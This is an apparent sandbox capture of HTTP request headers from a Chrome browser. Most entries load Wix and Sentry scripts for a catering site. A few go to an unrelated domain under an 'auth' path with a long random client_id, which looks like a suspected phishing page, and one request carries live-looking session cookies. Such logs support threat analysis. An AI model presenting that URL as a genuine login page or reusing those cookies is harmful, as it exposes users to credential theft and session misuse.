Source: global trafficHTTP traffic detected: GET /6.18.2/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/pf.png HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_api/tag-manager/api/v1/tags/sites/8fc1138c-79b4-4e29-bbc0-d551c6ca71af?wixSite=false&htmlsiteId=cd5327d5-636b-4778-a97d-3945688a9fde&language=en&partytown=false HTTP/1.1Host: www.samantacatering.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; bSession=153dfd08-7420-4371-86fb-5d02f7e531d5|1
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /client/pfavico.ico HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6.18.2/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.json HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.samantacatering.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.json HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.samantacatering.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /client/pfavico.ico HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.json HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.json HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap.d49fc07e.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_menu.647b0eb4.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_menu.647b0eb4.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap.d49fc07e.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_30.55a3b177.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_30.55a3b177.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[SkipToContentButton].69abe737.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
